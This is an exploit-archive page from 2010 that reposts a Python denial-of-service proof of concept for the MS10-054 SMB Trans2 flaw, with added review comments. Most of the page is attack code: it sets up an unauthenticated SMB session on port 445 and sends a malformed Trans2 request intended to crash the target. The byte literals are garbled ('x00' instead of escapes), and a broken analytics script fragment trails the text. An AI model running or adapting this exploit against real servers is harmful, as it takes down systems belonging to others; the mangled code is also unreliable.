Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
Posted on 10 August 2010
# ===========================================================
# Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
# ===========================================================
#
# Denial-of-service proof of concept as posted on the page: it opens an
# unauthenticated SMB/CIFS session to TCP port 445 (Negotiate -> Session
# Setup AndX + Tree Connect -> Trans2 QUERY_FS_INFO) and, per the script's
# own output message, expects the target to crash after the malformed
# Trans2 request.  The vulnerability is the one addressed by the Microsoft
# update named in the title (MS10-054); a patched server is the mitigation.
#
# NOTE(review): the string literals below read as plain ASCII ("x00x00..."
# ) rather than byte escapes -- this looks like a page-extraction artefact.
# As pasted, the script sends that ASCII text, not the SMB frames the
# comments describe.  Python 2 syntax throughout (print statements).
#!/usr/bin/env python
import sys,struct,socket
from socket import *
# Usage banner: requires TARGET and SHARE-NAME positional arguments.
if len(sys.argv)<=2:
    print '#######################################################################'
    print '# MS10-054 Proof Of Concept by Laurent Gaffie'
    print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
    print '# Example: python '+sys.argv[0]+' 192.168.8.101 users'
    print '# http://g-laurent.blogspot.com/'
    print '# http://twitter.com/laurentgaffie'
    print '# Email: laurent.gaffie{at}gmail{dot}com'
    print '####################################################################### '
    sys.exit()
# (address, port) tuple for socket.connect(); SMB over TCP on 445.
host = str(sys.argv[1]),445
# Negotiate Protocol Request.  The first 4 "bytes" are the NetBIOS session
# header (length 0x9a); the rest is the SMB header plus the dialect list
# (the ASCII dialect names -- "PC NETWORK PROGRAM 1.0", "NT LM 0.12", ... --
# are readable in the hex pairs).
packetnego = "x00x00x00x9a"
packetnego += "xffx53x4dx42x72x00x00x00x00x00x00x00x00x00x00x00"
packetnego += "x00x00x00x00x00x00x00x00x00x00xc3x15x00x00x01x3d"
packetnego += "x00x77x00x02x50x43x20x4ex45x54x57x4fx52x4bx20x50"
packetnego += "x52x4fx47x52x41x4dx20x31x2ex30x00x02x4dx49x43x52"
packetnego += "x4fx53x4fx46x54x20x4ex45x54x57x4fx52x4bx53x20x33"
packetnego += "x2ex30x00x02x44x4fx53x20x4cx4dx31x2ex32x58x30x30"
packetnego += "x32x00x02x44x4fx53x20x4cx41x4ex4dx41x4ex32x2ex31"
packetnego += "x00x02x57x69x6ex64x6fx77x73x20x66x6fx72x20x57x6f"
packetnego += "x72x6bx67x72x6fx75x70x73x20x33x2ex31x61x00x02x4e"
packetnego += "x54x20x4cx4dx20x30x2ex31x32x00"
def tidpiduidfield(data):
    # Return data[28:34] of the server's reply so it can be echoed back in
    # the next request.  Going by the function name and the offsets (SMB
    # header follows the 4-byte NetBIOS header), this should be the
    # TID/PID/UID fields -- not verified here.
    all_=data[28:34]
    return all_
def handle(data):
    # Build the next request from the server's previous reply.
    #
    # data[8:10] is the SMB command byte (plus the following byte) of the
    # reply; the script uses it to tell which stage of the exchange it is
    # at.  Returns the raw request to send, or None (see note at the end).
    ##Chained SMB commands; Session Setup AndX Request,Tree connect
    if data[8:10] == "x72x00":
        # Reply to the Negotiate response.  The share path is built from
        # argv[2]; its length is packed big-endian and only the low byte
        # ([3:4]) is used, so a share name longer than 255 is truncated in
        # the length field but not in the payload.
        sharename = "x00x00x5cx5cx5c"+str(sys.argv[2])+"x00x3fx3fx3fx3fx3fx00"
        packetsession = "xffx53x4dx42x73x00x00x00x00x10x00x00x00x00x00x00"
        packetsession += "x00x00x00x00x00x00x00x00x00x00xd5x15x01x00x81x2f"
        packetsession += "x0dx75x00x7ax00x68x0bx32x00x00x00x00x00x00x00x18"
        packetsession += "x00x00x00x00x00x00x00x04x00x00x00x3dx00x01x01x01"
        packetsession += "x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
        packetsession += "x01x01x01x01x01x59x4fx00x57x4fx52x4bx47x52x4fx55"
        packetsession += "x50x00x57x69x6ex64x6fx77x73x20x34x2ex30x00x57x69"
        packetsession += "x6ex64x6fx77x73x20x34x2ex30x00x04xffx00x00x00x00"
        packetsession += "x00x01x00"+struct.pack(">i", len(sharename))[3:4]+sharename
        print "[+]Session Query sent"
        # Prefix the 4-byte NetBIOS length header (big-endian int).
        return struct.pack(">i", len(packetsession))+packetsession
    ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
    if data[8:10] == "x73x00":
        # Reply to the Session Setup response: the malformed Trans2 request
        # that the page attributes to the zero-size pool allocation.  The
        # TID/PID/UID slice from the reply is spliced into the header.
        packetrans = "x00x00x00x46"
        packetrans += "xffx53x4dx42x32x00x00x00x00x00x01xc8x00x00x00x00"
        packetrans += "x00x00x00x00x00x00x00x00"+tidpiduidfield(data)+"x13x00"
        packetrans += "x0fx02x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
        packetrans += "x00x00x00x02x00x44x00x00x00x46x00x01x00x03x00x05"
        packetrans += "x00x00x44x20x05x01"
        print "[+]Malformed Trans2 packet sent [+]The target should be down now"
        return packetrans
    # NOTE: any other reply falls through and returns None; run() then
    # passes None to send(), which raises and is swallowed by its except.
def run():
    # Drive the exchange: send Negotiate, then loop feeding each reply to
    # handle() and sending its result until the connection errors out.
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(host)
    # 2-second receive timeout; a timeout is also an Exception and ends
    # the loop below.
    s.settimeout(2)
    s.send(packetnego)
    print "[+]Negotiate Protocol Request sent"
    try:
        while True:
            data = s.recv(1024)
            s.send(handle(data))
    except Exception:
        # Broad catch: connection reset, timeout, and the None-send
        # TypeError all end here silently, so the script cannot actually
        # tell whether the target went down.
        pass
    s.close()
run()
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-10]
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>